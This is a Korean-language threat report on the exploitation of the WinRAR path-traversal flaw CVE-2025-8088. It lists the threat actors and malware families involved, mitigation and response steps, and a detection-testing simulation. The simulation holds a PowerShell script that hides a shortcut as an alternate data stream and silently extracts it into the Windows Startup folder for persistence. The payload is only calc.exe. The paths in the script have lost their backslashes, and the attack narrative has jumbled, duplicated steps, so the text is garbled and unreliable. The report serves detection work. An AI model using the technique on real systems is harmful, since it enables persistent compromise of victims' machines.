CVE-2025-8088: 다양한 위협 행위자들이 중요한 WinRAR 결함을 악용하다

요약

Google 위협 인텔리전스 그룹은 심각도가 높은 WinRAR 경로 탐색 취약점인 CVE-2025-8088의 광범위한 악용을 보고하고 있습니다. 공격자들은 이를 사용하여 악성 파일을 Windows 시작 폴더에 넣어 지속적인 액세스를 얻고 있습니다. 국가 후원 그룹과 금전적 목적의 그룹 모두 RAT, 다운로드 도구 및 추가 페이로드를 전달하기 위해 이 취약점을 활용하고 있습니다. 보고서는 탐지 및 완화 지침과 함께 지표를 공유합니다.

조사

연구원들은 여러 행위자들(UNC4895, APT44, Turla, PRC 기반 그룹)이 대체 데이터 스트림(ADS)을 악용하여 LNK, HTA, BAT 파일을 시작 폴더에 떨어뜨리는 조작된 RAR 아카이브와 연결되었음을 밝혔습니다. 일부 아카이브는 로그온 시 HTA 또는 BAT를 시작하는 LNK 핸들러를 배치했습니다. 관찰된 악성코드 그룹에는 NESTPACKER, POISONIVY, XWorm, AsyncRAT이 포함됩니다. 공유 기반 시설과 재사용된 익스플로잇 코드는 우크라이나 및 다른 지역을 목표로 한 캠페인 전반에서 나타났습니다.

완화

WinRAR를 7.13 이상으로 업그레이드하고 애플리케이션 허용 목록을 시행하십시오. 가능한 곳에서 ADS 노출을 줄이고 새로운 LNK, HTA, BAT, 스크립트 파일에 대해 시작 폴더를 모니터링하십시오. Google Safe Browsing 및 이메일 보안 제어를 적용하여 악성 아카이브의 초기 차단을 시도하십시오.

대응

특히 바로 가기와 스크립트에 대해 RAR 추출과 관련된 시작 경로 파일 생성 탐지. 알려진 파일명 및 해시와 경고를 상관시켜 감염된 호스트를 격리하고, 악성코드 계열을 확인하며, 인시던트 대응 중 시작 지속성을 제거하십시오.

시뮬레이션 실행

사전 요구 사항: 원격 측정 및 기준선 사전 점검이 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 유발하도록 설계된 적대적 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령어 및 내러티브는 반드시 식별된 TTP를 직접 반영해야 하며, 탐지 논리에서 예상되는 정확한 원격 측정을 생성하는 것을 목표로 합니다.

• 공격 내러티브 및 명령어:
  공격자는 무해해 보이는 PDF (malicious.lnk)에 부착된 Windows 바로가기를 포함하는 악성 RAR 아카이브를 제작합니다.innocuous.pdf). CVE-2025-8088을 활용하여, 공격자는 WinRAR이 대상 경로에 대해 스트림 이름을 정리하지 않고 직접 ADS를 추출할 것임을 알고 있습니다. 아카이브는 피해자 기계에 전달됩니다 (예: 피싱을 통해). 그런 다음 공격자는 WinRAR을 무음 모드로 실행하여 페이로드를 현재 사용자의 시작 폴더로 직접 추출하여 지속성을 얻습니다.

  1. 악성 LNK 페이로드 생성 (실행을 시작하는 바로가기 cmd.exe /c calc.exe).
  2. RAR 내부에서 LNK를 ADS로 부착 innocuous.pdf RAR 전달
  3. 피해자에게. 시작 디렉터리에 WinRAR 추출 실행
  4. WinRAR 추출 실행 시작 디렉터리에.

• 회귀 테스트 스크립트:

  # --------------------------------------------------------------
  # PowerShell 스크립트로 CVE-2025-8088 LNK-ADS 지속성 시뮬레이션
  # --------------------------------------------------------------
  
  # 1. 변수
  $tempDir = "$envTEMPLNK_ADS_Test"
  $pdfPath = "$tempDirinnocuous.pdf"
  $lnkPath = "$tempDirmalicious.lnk"
  $rarPath = "$tempDirmalicious.rar"
  $startupPath = "$envAPPDATAMicrosoftWindowsStart MenuProgramsStartup"
  
  # 작업영역 정리 보장
  Remove-Item -Recurse -Force $tempDir -ErrorAction SilentlyContinue
  New-Item -ItemType Directory -Path $tempDir | Out-Null
  
  # 2. 더미 PDF 생성 (ADS 시연에 빈 파일로 작업)
  New-Item -ItemType File -Path $pdfPath | Out-Null
  
  # 3. 계산기로 향하는 악성 LNK 생성
  $ws = New-Object -ComObject WScript.Shell
  $shortcut = $ws.CreateShortcut($lnkPath)
  $shortcut.TargetPath = "calc.exe"
  $shortcut.WindowStyle = 1
  $shortcut.Save()
  
  # 4. PDF를 패킹하고 WinRAR CLI로 LNK를 ADS로 첨부
  #    구문은 "malicious.lnk"라는 ADS를 PDF에 부착합니다.
  & "C:Program FilesWinRARWinRAR.exe" a -df $rarPath $pdfPath "$lnkPath:malicious.lnk"
  
  # 5. 시작 폴더에 직접 RAR 추출 (무음 모드)
  & "C:Program FilesWinRARWinRAR.exe" x -inul $rarPath $startupPath
  
  # 6. 이제 LNK가 시작 폴더에 존재하는지 확인 (일반 .lnk로 표시될 것입니다)
  $extractedLnk = Join-Path $startupPath "malicious.lnk"
  if (Test-Path $extractedLnk) {
      Write-Host "[+] 시작에 배포된 악성 바로가기: $extractedLnk"
  } else {
      Write-Error "[-] 바로가기를 찾을 수 없음 - 추출 실패 가능성."
  }
  
  # --------------------------------------------------------------
  # 스크립트 끝
  # --------------------------------------------------------------

• 정리 명령:

  # 시작에서 악성 바로가기를 제거
  $lnk = "$envAPPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.lnk"
  if (Test-Path $lnk) { Remove-Item -Force $lnk }
  
  # 임시 파일과 디렉토리 삭제
  $temp = "$envTEMPLNK_ADS_Test"
  if (Test-Path $temp) { Remove-Item -Recurse -Force $temp }

보고서 종료